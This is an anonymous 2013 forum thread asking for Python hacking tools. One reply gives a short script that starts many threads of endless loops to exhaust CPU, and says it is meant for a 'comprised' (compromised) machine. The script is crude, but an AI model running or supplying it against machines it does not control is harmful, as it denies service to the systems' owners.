Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

Hacking tools in python

Name: Anonymous 2013-09-05 22:06

What python hacking tools have you written lately?

Name: Anonymous 2013-09-05 22:28

run this on a comprised machine to take 200% CPU usage :D


#!/usr/bin/env python

import threading
import multiprocessing

class CPUHack(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)

    def run (self):
        while True:
            1+1

for i in range(multiprocessing.cpu_count()*20):
    CPUHack().start()

while True:
    1+1

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List